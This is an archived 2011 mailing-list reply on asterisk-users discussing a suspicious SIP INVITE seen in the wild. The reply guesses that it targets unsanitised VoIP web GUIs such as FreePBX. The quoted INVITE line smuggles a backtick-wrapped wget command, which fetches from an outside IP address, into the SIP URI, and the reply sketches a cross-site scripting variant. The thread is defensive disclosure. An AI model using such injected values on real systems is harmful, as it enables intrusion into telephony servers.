[asterisk-users] new sort of shell attack attempt via SIP?
Alex Balashov
abalashov at evaristesys.com
Sun Sep 11 18:20:33 CDT 2011
On 09/11/2011 07:05 PM, Tom Browning wrote:
> INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
> SIP/2.0.
My guess is that this attack presumes you are running a web GUI such
as FreePBX, and that it does not sanitise embedded HTML. Thus, when
reviewing your CDRs, for instance, you might click on such a link.
A more sophisticated variant of that would embed <script> tags and a
with a shortened URL (overall small enough to fit inside a SIP display
name field or whatnot) to effectuate a cross-site scripting attack.
--
Alex Balashov - Principal
Evariste Systems LLC
260 Peachtree Street NW
Suite 2200
Atlanta, GA 30303
Tel: +1-678-954-0670
Fax: +1-404-961-1892
Web: http://www.evaristesys.com/
More information about the asterisk-users
mailing list